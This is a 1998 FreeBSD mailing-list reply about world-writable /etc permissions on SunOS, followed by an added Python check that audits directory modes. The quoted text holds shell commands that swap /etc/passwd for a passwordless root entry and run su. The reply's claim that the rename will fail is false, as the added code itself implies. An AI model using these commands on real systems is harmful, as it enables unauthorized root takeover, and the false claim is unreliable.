Message-ID: <084DD226F592D211988800A024AC583B02B783@exchange.nectech.co.uk>
From: "Bond, Jeffery"
To: "'FreeBSD questions'"
Cc: "'cjc@cc942873-a.ewndsr1.nj.home.com'"
Subject: RE: Basic Security Question
Date: Fri, 18 Dec 1998 09:54:54 -0000

>Mark Ovens wrote,
>
>> and on all the Sparcs running SunOS4.1.3_U1 here are:
>>
>> gppsun4:/{8}% ls -ldug etc
>> drwxrwsrwx 10 bin staff 2048 Dec 17 09:30 etc
>>
>> which is even less secure as it's writable by all!
>
>I may be dense. Is that some kind of joke or something? As dense as I
>am, I know for sure that even I could take any account on a system
>with permissions like that and have control of root in this many
>keystrokes:
>
>% cd /etc
>% echo "root::0:0:Evil Root:/:/bin/csh" > passwd.new
>% mv passwd passwd.old
>% mv passwd.new passwd
>% su
>#

Just because the directory is writable, this doesn't mean the existing files in it are too.
You won't be able to do 'mv passwd passwd.old'.

Jeff
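An added example, not part of the original message: a Python audit check that applies the POSIX rule for `rename(2)` and `unlink(2)` (permission comes from the containing directory's write and search bits, restricted by the sticky bit) to an `ls -l` mode string like the one quoted in the thread. The function names are hypothetical, and every mode string except the quoted `drwxrwsrwx` is constructed.

```python
import os
import stat

SPECIAL = (stat.S_ISUID, stat.S_ISGID, stat.S_ISVTX)
TYPES = {"d": stat.S_IFDIR, "-": stat.S_IFREG, "l": stat.S_IFLNK}


def mode_from_ls(text):
    """Convert an `ls -l` mode string such as 'drwxrwsrwx' to st_mode bits."""
    mode = TYPES[text[0]]
    for i, ch in enumerate(text[1:10]):
        bit = 0o400 >> i
        if ch in "rwx":
            mode |= bit
        elif ch in "st":      # set-id or sticky bit, with execute/search
            mode |= bit | SPECIAL[i // 3]
        elif ch in "ST":      # set-id or sticky bit, without execute/search
            mode |= SPECIAL[i // 3]
    return mode


def replaceable_by(mode):
    """Classes other than the owner whose members can rename or remove
    entries in a directory with this mode, whatever the entries' own modes.

    rename(2) and unlink(2) need write and search permission on the
    directory; the sticky bit limits them to the owner of the entry or
    of the directory.
    """
    if not stat.S_ISDIR(mode) or mode & stat.S_ISVTX:
        return []
    found = []
    if mode & stat.S_IWGRP and mode & stat.S_IXGRP:
        found.append("group")
    if mode & stat.S_IWOTH and mode & stat.S_IXOTH:
        found.append("other")
    return found


def audit(path):
    """Apply the same check to a live directory."""
    return replaceable_by(os.stat(path).st_mode)


if __name__ == "__main__":
    # First string is the one quoted in the thread; the others are constructed.
    for s in ("drwxrwsrwx", "drwxrwxrwt", "drwxr-xr-x"):
        print(s, replaceable_by(mode_from_ls(s)))
```

The check reads mode bits only; it does not account for ACLs, file flags, or a read-only mount.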